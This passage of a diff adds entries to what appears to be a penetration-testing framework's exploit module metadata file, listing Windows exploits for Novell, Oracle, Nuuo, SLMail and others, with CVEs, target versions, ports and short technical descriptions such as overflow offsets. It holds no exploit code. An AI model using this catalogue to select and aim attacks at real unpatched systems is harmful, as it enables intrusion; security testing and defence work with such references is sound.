"autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Scrutinizer NetFlow and sFlow Analyzer 9.5.2 or older" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb", + "is_install_path": true, + "ref_name": "windows/mysql/scrutinizer_upload_exec", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/nfs/xlink_nfsd": { + "name": "Omni-NFS Server Buffer Overflow", + "fullname": "exploit/windows/nfs/xlink_nfsd", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-11-06", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Xlink Omni-NFS Server 5.2\n When sending a specially crafted nfs packet, an attacker may be able\n to execute arbitrary code.", + "references": [ + "CVE-2006-5780", + "OSVDB-30224", + "BID-20941", + "URL-http://www.securityfocus.com/data/vulnerabilities/exploits/omni-nfs-server-5.2-stackoverflow.pm" + ], + "platform": "Windows", + "arch": "", + "rport": 2049, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/nfs/xlink_nfsd.rb", + "is_install_path": true, + "ref_name": "windows/nfs/xlink_nfsd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/nimsoft/nimcontroller_bof": { + "name": "CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow", + "fullname": "exploit/windows/nimsoft/nimcontroller_bof", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-02-05", + "type": "exploit", + "author": [ + "wetw0rk" + ], + "description": "This module exploits a buffer overflow within the CA Unified Infrastructure Management nimcontroller.\n The vulnerability occurs in the robot (controller) component when sending a specially crafted directory_list\n probe.\n\n Technically speaking the target host must also be vulnerable to CVE-2020-8010 in order to reach the\n directory_list probe.", + "references": [ + "CVE-2020-8010", + "CVE-2020-8012", + "URL-https://support.broadcom.com/external/content/release-announcements/CA20200205-01-Security-Notice-for-CA-Unified-Infrastructure-Management/7832", + "PACKETSTORM-156577" + ], + "platform": "Windows", + "arch": "x64", + "rport": 48000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal (x64) - v7.80.3132" + ], + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/exploits/windows/nimsoft/nimcontroller_bof.rb", + "is_install_path": true, + "ref_name": "windows/nimsoft/nimcontroller_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/nntp/ms05_030_nntp": { + "name": "MS05-030 Microsoft Outlook Express NNTP Response Parsing Buffer Overflow", + "fullname": "exploit/windows/nntp/ms05_030_nntp", + "aliases": [], + "rank": 300, + "disclosure_date": "2005-06-14", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the news reader of Microsoft\n Outlook Express.", + "references": [ + "CVE-2005-1213", + "OSVDB-17306", + "BID-13951", + "MSB-MS05-030" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 English SP0-SP4", + "Windows XP English SP0/SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/nntp/ms05_030_nntp.rb", + "is_install_path": true, + "ref_name": "windows/nntp/ms05_030_nntp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/novell/file_reporter_fsfui_upload": { + "name": "NFR Agent FSFUI Record File Upload RCE", + "fullname": "exploit/windows/novell/file_reporter_fsfui_upload", + "aliases": [], + "rank": 500, + "disclosure_date": "2012-11-16", + "type": "exploit", + "author": [ + "juan vazquez " + ], + "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload\n arbitrary files via a directory traversal while handling requests to /FSF/CMD with\n FSFUI records with UICMD 130. This module has been tested successfully against NFR\n Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).", + "references": [ + "CVE-2012-4959", + "OSVDB-87573", + "URL-https://www.rapid7.com/blog/post/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959" + ], + "platform": "Windows", + "arch": "", + "rport": 3037, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb", + "is_install_path": true, + "ref_name": "windows/novell/file_reporter_fsfui_upload", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/novell/groupwisemessenger_client": { + "name": "Novell GroupWise Messenger Client Buffer Overflow", + "fullname": "exploit/windows/novell/groupwisemessenger_client", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-07-02", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell's GroupWise Messenger Client.\n By sending a specially crafted HTTP response, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2008-2703", + "OSVDB-46041", + "BID-29602", + "URL-http://www.infobyte.com.ar/adv/ISR-17.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Novell GroupWise Messenger 2.0 Client", + "Novell GroupWise Messenger 1.0 Client" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/novell/groupwisemessenger_client.rb", + "is_install_path": true, + "ref_name": "windows/novell/groupwisemessenger_client", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/novell/netiq_pum_eval": { + "name": "NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution", + "fullname": "exploit/windows/novell/netiq_pum_eval", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-11-15", + "type": "exploit", + "author": [ + "rgod", + "juan vazquez " + ], + "description": "This module abuses a lack of authorization in the NetIQ Privileged User Manager\n service (unifid.exe) to execute arbitrary perl code. The problem exists in the\n ldapagnt module. The module has been tested successfully on NetIQ PUM 2.3.1 over\n Windows 2003 SP2, which allows to execute arbitrary code with SYSTEM privileges.", + "references": [ + "CVE-2012-5932", + "OSVDB-87334", + "BID-56539", + "EDB-22738" + ], + "platform": "Windows", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2003 SP2 / NetIQ Privileged User Manager 2.3.1" + ], + "mod_time": "2022-03-11 12:22:27 +0000", + "path": "/modules/exploits/windows/novell/netiq_pum_eval.rb", + "is_install_path": true, + "ref_name": "windows/novell/netiq_pum_eval", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/novell/nmap_stor": { + "name": "Novell NetMail NMAP STOR Buffer Overflow", + "fullname": "exploit/windows/novell/nmap_stor", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-12-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.", + "references": [ + "CVE-2006-6424", + "OSVDB-31363", + "BID-21725" + ], + "platform": "Windows", + "arch": "", + "rport": 689, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/novell/nmap_stor.rb", + "is_install_path": true, + "ref_name": "windows/novell/nmap_stor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/novell/zenworks_desktop_agent": { + "name": "Novell ZENworks 6.5 Desktop/Server Management Overflow", + "fullname": "exploit/windows/novell/zenworks_desktop_agent", + "aliases": [], + "rank": 400, + "disclosure_date": "2005-05-19", + "type": "exploit", + "author": [ + "Unknown" + ], + "description": "This module exploits a heap overflow in the Novell ZENworks\n Desktop Management agent. This vulnerability was discovered\n by Alex Wheeler.", + "references": [ + "CVE-2005-1543", + "OSVDB-16698", + "BID-13678" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/novell/zenworks_desktop_agent.rb", + "is_install_path": true, + "ref_name": "windows/novell/zenworks_desktop_agent", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/novell/zenworks_preboot_op21_bof": { + "name": "Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow", + "fullname": "exploit/windows/novell/zenworks_preboot_op21_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-03-30", + "type": "exploit", + "author": [ + "Stephen Fewer", + "juan vazquez " + ], + "description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management 10 SP2. The vulnerability exists in the Preboot service and can be\n triggered by sending a specially crafted packet with the opcode 0x21\n (PROXY_CMD_FTP_FILE) to port 998/TCP. The module has been successfully tested on\n Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2\n (DEP bypass).", + "references": [ + "CVE-2012-2215", + "OSVDB-65361", + "BID-40486", + "ZDI-10-090", + "URL-http://www.novell.com/support/kb/doc.php?id=7005572" + ], + "platform": "Windows", + "arch": "", + "rport": 998, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb", + "is_install_path": true, + "ref_name": "windows/novell/zenworks_preboot_op21_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/novell/zenworks_preboot_op4c_bof": { + "name": "Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow", + "fullname": "exploit/windows/novell/zenworks_preboot_op4c_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-02-22", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "juan vazquez " + ], + "description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management. The vulnerability exists in the Preboot service and can be triggered\n by sending a specially crafted packet with the opcode 0x4c\n (PROXY_CMD_PREBOOT_TASK_INFO2) to port 998/TCP. The module has been successfully\n tested on Novell ZENworks Configuration Management 10 SP2 / SP3 and Windows Server\n 2003 SP2 (DEP bypass).", + "references": [ + "CVE-2011-3176", + "OSVDB-80231", + "BID-52659", + "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=974" + ], + "platform": "Windows", + "arch": "", + "rport": 998, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2", + "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb", + "is_install_path": true, + "ref_name": "windows/novell/zenworks_preboot_op4c_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/novell/zenworks_preboot_op6_bof": { + "name": "Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow", + "fullname": "exploit/windows/novell/zenworks_preboot_op6_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-03-30", + "type": "exploit", + "author": [ + "Stephen Fewer", + "juan vazquez " + ], + "description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management 10 SP2. The vulnerability exists in the Preboot service and can be\n triggered by sending a specially crafted packet with the opcode 0x06\n (PROXY_CMD_CLEAR_WS) to the 998/TCP port. The module has been successfully tested\n on Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2\n (DEP bypass).", + "references": [ + "OSVDB-65361", + "BID-40486", + "ZDI-10-090", + "URL-http://www.novell.com/support/kb/doc.php?id=7005572" + ], + "platform": "Windows", + "arch": "", + "rport": 998, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb", + "is_install_path": true, + "ref_name": "windows/novell/zenworks_preboot_op6_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/novell/zenworks_preboot_op6c_bof": { + "name": "Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow", + "fullname": "exploit/windows/novell/zenworks_preboot_op6c_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-02-22", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "juan vazquez " + ], + "description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management. The vulnerability exists in the Preboot service and can be triggered by\n sending a specially crafted packet with the opcode 0x6c (PROXY_CMD_GET_NEXT_STEP)\n to port 998/TCP. The module has been successfully tested on Novell ZENworks\n Configuration Management 10 SP2 / SP3 and Windows Server 2003 SP2 (DEP bypass).", + "references": [ + "CVE-2011-3175", + "OSVDB-80231", + "BID-52659", + "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=973" + ], + "platform": "Windows", + "arch": "", + "rport": 998, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2", + "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb", + "is_install_path": true, + "ref_name": "windows/novell/zenworks_preboot_op6c_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/nuuo/nuuo_cms_fu": { + "name": "Nuuo Central Management Server Authenticated Arbitrary File Upload", + "fullname": "exploit/windows/nuuo/nuuo_cms_fu", + "aliases": [], + "rank": 0, + "disclosure_date": "2018-10-11", + "type": "exploit", + "author": [ + "Pedro Ribeiro " + ], + "description": "The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the\n CMS Server.\n The vulnerability is in the \"FileName\" parameter, which accepts directory traversal (..\\..\\)\n characters. Therefore, this function can be abused to overwrite any files in the installation\n drive of CMS Server.\n\n This vulnerability is exploitable in CMS versions up to and including v2.4.\n\n This module will either use a provided session number (which can be guessed with an auxiliary\n module) or attempt to login using a provided username and password - it will also try the\n default credentials if nothing is provided.\n\n This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module\n fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will\n not execute successfully.", + "references": [ + "CVE-2018-17936", + "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02", + "URL-https://seclists.org/fulldisclosure/2019/Jan/51", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": 5180, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Nuuo Central Management Server <= v2.4.0" + ], + "mod_time": "2022-01-13 18:54:56 +0000", + "path": "/modules/exploits/windows/nuuo/nuuo_cms_fu.rb", + "is_install_path": true, + "ref_name": "windows/nuuo/nuuo_cms_fu", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/nuuo/nuuo_cms_sqli": { + "name": "Nuuo Central Management Authenticated SQL Server SQLi", + "fullname": "exploit/windows/nuuo/nuuo_cms_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-10-11", + "type": "exploit", + "author": [ + "Pedro Ribeiro " + ], + "description": "The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.\n This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is\n installed by default, xp_cmdshell can be enabled and abused to achieve code execution.\n This module will either use a provided session number (which can be guessed with an auxiliary\n module) or attempt to login using a provided username and password - it will also try the\n default credentials if nothing is provided.", + "references": [ + "CVE-2018-18982", + "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02", + "URL-https://seclists.org/fulldisclosure/2019/Jan/51", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": 5180, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Nuuo Central Management Server <= v2.10.0" + ], + "mod_time": "2022-01-13 18:54:56 +0000", + "path": "/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb", + "is_install_path": true, + "ref_name": "windows/nuuo/nuuo_cms_sqli", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/oracle/client_system_analyzer_upload": { + "name": "Oracle Database Client System Analyzer Arbitrary File Upload", + "fullname": "exploit/windows/oracle/client_system_analyzer_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-01-18", + "type": "exploit", + "author": [ + "1c239c43f521145fa8385d64a9c32243", + "juan vazquez " + ], + "description": "This module exploits an arbitrary file upload vulnerability on the Client\n Analyzer component as included in Oracle Database 11g, which allows remote\n attackers to upload and execute arbitrary code. This module has been tested\n successfully on Oracle Database 11g 11.2.0.1.0 on Windows 2003 SP2, where execution\n through the Windows Management Instrumentation service has been used.", + "references": [ + "CVE-2010-3600", + "OSVDB-70546", + "BID-45883", + "ZDI-11-018", + "URL-http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html" + ], + "platform": "Windows", + "arch": "", + "rport": 1158, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Oracle Oracle11g 11.2.0.1.0 / Windows 2003 SP2" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/oracle/client_system_analyzer_upload.rb", + "is_install_path": true, + "ref_name": "windows/oracle/client_system_analyzer_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/oracle/extjob": { + "name": "Oracle Job Scheduler Named Pipe Command Execution", + "fullname": "exploit/windows/oracle/extjob", + "aliases": [], + "rank": 600, + "disclosure_date": "2007-01-01", + "type": "exploit", + "author": [ + "David Litchfield", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job\n Scheduler is implemented via the component extjob.exe which listens on a named pipe\n called \"orcljsex\" and execute arbitrary commands received over this channel via\n CreateProcess(). In order to connect to the Named Pipe remotely, SMB access is required.\n Note that the Job Scheduler is disabled in default installations.", + "references": [ + "URL-http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/oracle/extjob.rb", + "is_install_path": true, + "ref_name": "windows/oracle/extjob", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/oracle/osb_ndmp_auth": { + "name": "Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow", + "fullname": "exploit/windows/oracle/osb_ndmp_auth", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-01-14", + "type": "exploit", + "author": [ + "MC " + ], + "description": "The module exploits a stack buffer overflow in Oracle Secure Backup.\n When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet,\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-5444", + "OSVDB-51340", + "URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html" + ], + "platform": "Windows", + "arch": "", + "rport": 10000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Oracle Secure Backup 10.1.0.3 (Windows 2003 SP0/Windows XP SP3)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/oracle/osb_ndmp_auth.rb", + "is_install_path": true, + "ref_name": "windows/oracle/osb_ndmp_auth", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/oracle/tns_arguments": { + "name": "Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow", + "fullname": "exploit/windows/oracle/tns_arguments", + "aliases": [], + "rank": 400, + "disclosure_date": "2001-06-28", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Oracle 8i. When\n sending a specially crafted packet containing an overly long\n ARGUMENTS string to the TNS service, an attacker may be able\n to execute arbitrary code.", + "references": [ + "CVE-2001-0499", + "OSVDB-9427", + "BID-2941" + ], + "platform": "Windows", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Oracle 8.1.7.0.0 Standard Edition (Windows 2000)", + "Oracle 8.1.7.0.0 Standard Edition (Windows 2003)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/oracle/tns_arguments.rb", + "is_install_path": true, + "ref_name": "windows/oracle/tns_arguments", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/oracle/tns_auth_sesskey": { + "name": "Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow", + "fullname": "exploit/windows/oracle/tns_auth_sesskey", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-10-20", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in Oracle. When\n sending a specially crafted packet containing a long AUTH_SESSKEY value\n to the TNS service, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2009-1979", + "OSVDB-59110", + "BID-36747", + "URL-http://blogs.conus.info/node/28", + "URL-http://blogs.conus.info/node/35", + "URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2009.html" + ], + "platform": "Windows", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Oracle 10.2.0.1.0 Enterprise Edition", + "Oracle 10.2.0.4.0 Enterprise Edition" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/oracle/tns_auth_sesskey.rb", + "is_install_path": true, + "ref_name": "windows/oracle/tns_auth_sesskey", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/oracle/tns_service_name": { + "name": "Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow", + "fullname": "exploit/windows/oracle/tns_service_name", + "aliases": [], + "rank": 400, + "disclosure_date": "2002-05-27", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Oracle. When\n sending a specially crafted packet containing a long SERVICE_NAME\n to the TNS service, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2002-0965", + "OSVDB-5041", + "BID-4845", + "URL-http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Oracle 8.1.7.0.0 Standard Edition (Windows 2000)", + "Oracle 8.1.7.0.0 Standard Edition (Windows 2003)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/oracle/tns_service_name.rb", + "is_install_path": true, + "ref_name": "windows/oracle/tns_service_name", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/pop3/seattlelab_pass": { + "name": "Seattle Lab Mail 5.5 POP3 Buffer Overflow", + "fullname": "exploit/windows/pop3/seattlelab_pass", + "aliases": [], + "rank": 500, + "disclosure_date": "2003-05-07", + "type": "exploit", + "author": [ + "stinko " + ], + "description": "There exists an unauthenticated buffer overflow vulnerability\n in the POP3 server of Seattle Lab Mail 5.5 when sending a password\n with excessive length.\n\n Successful exploitation should not crash either the\n service or the server; however, after initial use the\n port cannot be reused for successive exploitation until\n the service has been restarted. Consider using a command\n execution payload following the bind shell to restart\n the service if you need to reuse the same port.\n\n The overflow appears to occur in the debugging/error reporting\n section of the slmail.exe executable, and there are multiple\n offsets that will lead to successful exploitation. This exploit\n uses 2606, the offset that creates the smallest overall payload.\n The other offset is 4654.\n\n The return address is overwritten with a \"jmp esp\" call from the\n application library SLMFC.DLL found in %SYSTEM%\\system32\\. This\n return address works against all version of Windows and service packs.\n\n The last modification date on the library is dated 06/02/99. Assuming\n that the code where the overflow occurs has not changed in some time,\n prior version of SLMail may also be vulnerable with this exploit. The\n author has not been able to acquire older versions of SLMail for\n testing purposes. Please let us know if you were able to get this\n exploit working against other SLMail versions.", + "references": [ + "CVE-2003-0264", + "OSVDB-11975", + "BID-7519" + ], + "platform": "Windows", + "arch": "", + "rport": 110, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows NT/2000/XP/2003 (SLMail 5.5)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/pop3/seattlelab_pass.rb", + "is_install_path": true, + "ref_name": "windows/pop3/seattlelab_pass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/postgres/postgres_payload": { + "name": "PostgreSQL for Microsoft Windows Payload Execution", + "fullname": "exploit/windows/postgres/postgres_payload", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-04-10", + "type": "exploit", + "author": [ + "Bernardo Damele A. G. ", + "todb " + ], + "description": "On default Microsoft Windows installations of PostgreSQL the postgres\n service account may write to the current directory (which is usually\n \"C:\\Program Files\\PostgreSQL\\\\data\" where is the\n major.minor version of PostgreSQL). UDF DLL's may be sourced from\n there as well.\n\n This module uploads a Windows DLL file via the pg_largeobject method\n of binary injection and creates a UDF (user defined function) from\n that DLL. Because the payload is run from DllMain, it does not need to\n conform to specific Postgres API versions.", + "references": [ + "URL-https://web.archive.org/web/20100803002909/http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql" + ], + "platform": "Windows", + "arch": "", + "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2024-02-19 10:57:53 +0000", + "path": "/modules/exploits/windows/postgres/postgres_payload.rb", + "is_install_path": true, + "ref_name": "windows/postgres/postgres_payload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "postgresql" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/proxy/bluecoat_winproxy_host": { + "name": "Blue Coat WinProxy Host Header Overflow", + "fullname": "exploit/windows/proxy/bluecoat_winproxy_host", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-01-05", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in the Blue Coat Systems WinProxy\n service by sending a long port value for the Host header in a HTTP\n request.", + "references": [ + "CVE-2005-4085", + "OSVDB-22238", + "BID-16147", + "URL-http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "WinProxy <= 6.1 R1a Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb", + "is_install_path": true, + "ref_name": "windows/proxy/bluecoat_winproxy_host", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/proxy/ccproxy_telnet_ping": { + "name": "CCProxy Telnet Proxy Ping Overflow", + "fullname": "exploit/windows/proxy/ccproxy_telnet_ping", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-11-11", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits the YoungZSoft CCProxy <= v6.2 suite\n Telnet service. The stack is overwritten when sending an overly\n long address to the 'ping' command.", + "references": [ + "CVE-2004-2416", + "OSVDB-11593", + "BID-11666", + "EDB-621" + ], + "platform": "Windows", + "arch": "x86", + "rport": 23, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + 